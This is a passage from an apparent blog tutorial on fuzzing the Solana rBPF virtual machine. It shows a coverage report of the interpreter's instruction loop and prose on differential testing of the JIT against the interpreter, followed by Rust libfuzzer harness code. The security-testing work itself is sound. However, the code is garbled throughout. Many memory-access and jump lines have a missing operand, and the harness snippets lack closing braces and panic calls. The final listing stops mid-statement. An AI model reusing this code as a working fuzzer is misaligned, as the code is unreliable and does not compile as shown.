  726|  2.16M|            next_pc += 1;
  727|  2.16M|            let mut instruction_width = 1;
  728|  2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|  2.16M|            let dst = insn.dst as usize;
  730|  2.16M|            let src = insn.src as usize;
  731|  2.16M|
  732|  2.16M|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|  2.16M|            }
  738|       |
  739|  2.16M|            match insn.opc {
  740|  2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|      6|                    match insn.opc {
  742|      2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|      4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  757|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  762|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
  767|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  772|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  777|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  782|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
  787|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      6|                ebpf::LD_DW_IMM  => {
  796|      6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      6|                    instruction_width = 2;
  798|      6|                    next_pc += 1;
  799|      6|                    reg[dst] = insn.imm as u64;
  800|      6|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     21|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  805|     21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  806|      4|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|      4|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  810|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  811|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|     26|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  815|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
  816|     19|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|      5|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  820|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  821|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  827|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
  828|      1|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     11|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  832|     11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
  833|      6|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  837|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
  838|      6|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     16|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  842|     16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  849|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
  850|      2|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  854|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  859|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
  860|      2|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  864|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|    136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|     18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|     94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|     14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|    226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|     15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|     98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|      0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|      0|                    }
  886|      0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|      0|                    if reg[src] as i32 == 0 {
  890|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|      0|                    }
  892|      0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|      0|                    }
  895|      0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    102|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|     13|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|     46|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|     16|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      4|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|     32|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      2|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|      4|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|     54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|     90|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|     20|                    if reg[src] as u32 == 0 {
  909|      6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|     14|                    }
  911|     14|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|     96|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|     14|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|     59|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|      7|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|     15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|    236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      2|                ebpf::LE         => {
  920|      2|                    reg[dst] = match insn.imm {
  921|      1|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      1|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      2|                ebpf::BE         => {
  930|      2|                    reg[dst] = match insn.imm {
  931|      1|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      1|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|  16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|     26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|    145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|     25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|    480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|     13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|    191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|      5|                    if reg[src] == 0 {
  950|      3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|      2|                    }
  952|      2|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|      0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|      0|                    }
  958|      0|
  959|      0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|      0|                    if reg[src] == 0 {
  963|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      0|                    }
  965|      0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      0|                    }
  968|      0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    115|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|     19|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|     93|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|     19|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|     19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|     48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|      5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|     94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|    141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|     19|                    if reg[src] == 0 {
  982|      4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|     15|                    }
  984|     15|                                    reg[dst] %= reg[src];
  985|       |                },
  986|     98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|     17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|     89|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|     10|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|     14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|   327k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + as isize) as usize; },
  995|    116|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^76                                                           ^40
  996|   131k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^11
  997|   163k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^147k                                                         ^16.4k
  998|   131k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^34
  999|  65.5k|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^8
 1000|  65.5k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^11
 1001|  65.5k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^3
 1002|      6|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^4                                                            ^2
 1003|   131k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1004|  65.5k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^2
 1005|      3|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1                                                            ^2
 1006|      2|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + as isize) as usize; },
 1007|   196k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^196k                                                         ^3
 1008|   131k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^3
 1009|  65.5k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^6
 1010|     14|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1                                                            ^13
 1011|  65.5k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^12
 1012|  65.5k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1013|   131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^20
 1014|   147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^147k                                                         ^23
 1015|  65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1016|   131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     17|                    let mut resolved = false;
 1032|     17|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     17|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     17|                    if syscalls {
 1039|      6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      6|                        }
 1062|     11|                    }
 1063|       |
 1064|     17|                    if calls {
 1065|     11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     11|                        }
 1073|      6|                    }
 1074|       |
 1075|     17|                    if !resolved {
 1076|     17|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     11|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     39|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     39|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|  2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|     33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|  2.16M|            }
 1106|       |        }
 1107|       |
 1108|    683|        Err(EbpfError::ExecutionOverrun(
 1109|    683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    683|        ))
 1111|    886|    }

Now we see that jump and call instructions are actually used, and that we execute the content of the interpreter loop significantly more despite having approximately the same amount of successful calls to the interpreter function. From this, we can infer that not only are more programs successfully executed, but also that, of those executed, they tend to have more valid instructions executed overall.

While this isn’t hitting every branch, it’s now hitting significantly more – and with much more interesting values.

The development of this version of the fuzzer took about an hour, so we’re at a total of one hour of development.

JIT and differential fuzzing

Now that we have a fuzzer which can generate lots of inputs that are actually interesting to us, we can develop a fuzzer which can test both JIT and the interpreter against each other. But how do we even test them against each other?

Picking inputs, outputs, and configuration

As the definition of pseudo-oracle says: we need to check if the alternate program (for JIT, the interpreter, and vice versa), when provided with the same “input” provides the same “output”. So what inputs and outputs do we have?

For inputs, there are three notable things we’ll want to vary:

  • The config which determines how the VM should execute (what features and such)
  • The BPF program to be executed, which we’ll generate like we do in “smart”
  • The initial memory of the VMs

Once we’ve developed our inputs, we’ll also need to think of our outputs:

  • The “return state”, the exit code itself or the error state
  • The number of instructions executed (e.g., did the JIT program overrun?)
  • The final memory of the VMs

Then, to execute both JIT and the interpreter, we’ll take the following steps:

  • The same steps as the first fuzzers:
    • Use the rBPF verification pass (called “check”) to make sure that the VM will accept the input program
    • Initialise the memory, the syscalls, and the entrypoint
    • Create the executable data
  • Then prepare to perform the differential testing
    • JIT compile the BPF code (if it fails, fail quietly)
    • Initialise the interpreted VM
    • Initialise the JIT VM
    • Execute both the interpreted and JIT VMs
    • Compare return state, instructions executed, and final memory, and panic if any do not match.

Writing the fuzzer

As before, I’ve split this up into more manageable chunks so you can read them one at a time outside of their context before trying to interpret their final context.

Step 1: Defining our inputs
#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    ... snip ...
    prog: FuzzProgram,
    mem: Vec<u8>,
Step 2: Setting up the VM
fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ... snip ...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])

        // See step 3
Step 3: Executing our input and comparing output
fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
            if interp_mem != jit_mem {
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.


use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
